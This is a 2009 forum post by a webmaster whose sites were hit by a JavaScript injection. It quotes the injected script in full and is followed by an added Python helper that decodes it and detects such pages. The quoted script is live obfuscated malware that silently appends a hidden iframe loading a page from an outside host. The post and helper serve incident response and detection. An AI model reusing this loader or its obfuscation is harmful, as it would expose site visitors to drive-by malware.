Old 09-17-2009, 07:29 AM  
HEAT
Confirmed User
 
Join Date: Sep 2003
Posts: 2,255
Got hacked! Help!

Some of my sites that are using TGPX, TEVS and Comus thumbs are getting malware injection attacks. One of my dedicated servers got hit by a malware distributor.
The code below is injected right after the body tag of html, tmpl and some php files.

Quote:
<script>/**/function VtL2(RoHS, Nvy4, Ipv6) { var CnP8; CnP8=RoHS.split(Nvy4); var igs6=CnP8.join(Ipv6); return igs6;/**/ } function PKs7(cie8) { cie8 = VtL2(cie8,"##+##","'"); cie8 = VtL2(cie8,"##|##","\\"); igs6=""; gbq5 =""; for(k=0;k<cie8.length;k++) { igs6 = cie8.charCodeAt(k); if (igs6==32){igs6=35} else if (igs6==35){igs6=32} else if (igs6==59){igs6=64} else if (igs6==64){igs6=59} else if (igs6==37){igs6=42} else if (igs6==42){igs6=37} else if (igs6>=97 && igs6<=122) { igs6=igs6-97;igs6=25-igs6;igs6+=97; }else if (igs6>=65 && igs6<=90) { igs6=igs6-65;igs6=25-igs6;igs6+=65; }else if (igs6>=48 && igs6<=57) { igs6=igs6-48;igs6=9-igs6;igs6+=48; } gbq5 += String.fromCharCode(igs6); } return gbq5;/**/ }bqL1=eval;var RoSt;var Ldod;var CEg0;var Kil2;var cbk1;var Zku4;var Lfo0;bqL1(PKs7('Apf5#=###+##sggk://tzbhvc634.xln/hg/xhh/a/hgzgrx.ksk##+##@xyp8#=###+##ruiznv##+##@'));bqL1(P Ks7('IlHg#=#wlxfnvmg.xivzgvVovnvmg(xyp8)@IlHg.hvgZ ggiryfgv(##+##hix##+##,#Apf5)@'));bqL1(PKs7('IlHg. hvgZggiryfgv(##+##drwgs##+##,9)@IlHg.hvgZggiryfgv( ##+##svrtsg##+##,9)@IlHg.hvgZggiryfgv(##+##yliwvi# #+##,9)@'));bqL1(PKs7('IlHg.hvgZggiryfgv(##+##hgbo v##+##,##+##drwgs:#9@#svrtsg:#9@#yliwvi:#mlmv@##+# #)@'));bqL1(PKs7('IlHg.hvgZggiryfgv(##+##hgbov##+# #,##+##wrhkozb:mlmv##+##)@#Oul9=mzertzgli.fhviZtvm g.glOldviXzhv()@'));bqL1(PKs7('XVt9=Oul9.rmwvcLu(# #+##nhrv##+##)@Owlw=Oul9.rmwvcLu(##+##nhrv#1##+##) @Pro7=Oul9.rmwvcLu(##+##mg#3##+##)@'));if ((Ldod==-1)&&(CEg0>0)&&(Kil2==-1)){bqL1(PKs7('wlxfnvmg.ylwb.zkkvmwXsrow(IlHg)@')) ;}</script>
I wonder if any of you guys have had the same experience and any luck at detecting and removing it permanently? After throwing out my PC, uploading AVG and Spybot, changing all my passwords, and dropping FTP in favor of SFTP, I've now taken up the process of manually removing the code above.
But they are constantly adding this JS code even after I remove it...

Since the box is unmanaged, maybe I will have to reload the server OS and restore all the files from backup. But I'm worried the backup is infected as well...

Beware guys, check your server security, file/dir permissions etc. Also, your PC is not safe either. Install a good anti-malware and don't save passwords in your local FTP client.

http://www.webhostingtalk.com/showth...rame+injection
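As an added triage helper (not from the post or any of the named products), the Python below implements the self-inverse substitution the quoted script's PKs7() applies (letters and digits mirrored a<->z, A<->Z, 0<->9, plus the space/#, ;/@ and %/* swaps) so the strings fed to eval can be read, and flags a file where a script aliasing eval and using fromCharCode sits directly after the body tag, which is the placement the post describes. The function names and the sample page are my constructions; the obfuscated strings inside it are copied from the quoted script, minus the first one that carries the iframe URL.

```python
import re

def decode(s):
    """Undo the substitution used by PKs7() in the quoted script (self-inverse)."""
    s = s.replace("##+##", "'").replace("##|##", "\\")
    swaps = {32: 35, 35: 32, 59: 64, 64: 59, 37: 42, 42: 37}
    out = []
    for ch in s:
        c = ord(ch)
        if c in swaps:
            c = swaps[c]
        elif 97 <= c <= 122:          # a-z mirrored
            c = 97 + 25 - (c - 97)
        elif 65 <= c <= 90:           # A-Z mirrored
            c = 65 + 25 - (c - 65)
        elif 48 <= c <= 57:           # 0-9 mirrored
            c = 48 + 9 - (c - 48)
        out.append(chr(c))
    return "".join(out)

CALL_RE = re.compile(r"PKs7\('([^']*)'\)")

def decode_calls(script):
    """Plaintext of every PKs7('...') argument found in the script text."""
    return [decode(m.group(1)) for m in CALL_RE.finditer(script)]

# Marker from the post: a <script> straight after <body> that aliases eval
# and rebuilds strings with fromCharCode.
INJECT_RE = re.compile(r"<body[^>]*>\s*(<script>.*?</script>)", re.I | re.S)

def find_injection(html):
    """Offsets of suspicious scripts placed directly after the body tag."""
    hits = []
    for m in INJECT_RE.finditer(html):
        block = m.group(1)
        if "=eval;" in block and "fromCharCode" in block:
            hits.append(m.start(1))
    return hits

# Constructed sample page: a tail of the quoted script, URL string left out.
SAMPLE_SCRIPT = (
    "<script>function PKs7(c){/*...*/String.fromCharCode(c)}bqL1=eval;"
    "bqL1(PKs7('xyp8#=###+##ruiznv##+##@'));"
    "bqL1(PKs7('IlHg#=#wlxfnvmg.xivzgvVovnvmg(xyp8)@'));"
    "bqL1(PKs7('wlxfnvmg.ylwb.zkkvmwXsrow(IlHg)@'));</script>"
)
SAMPLE_PAGE = "<html><body>\n" + SAMPLE_SCRIPT + "\n<p>site</p></body></html>"

if __name__ == "__main__":
    for line in decode_calls(SAMPLE_PAGE):
        print(line)
    print("injection at:", find_injection(SAMPLE_PAGE))
```

Run against the full quoted script (with the extraction spaces removed) it also decodes the userAgent checks, which show the hidden iframe is only appended for certain browsers.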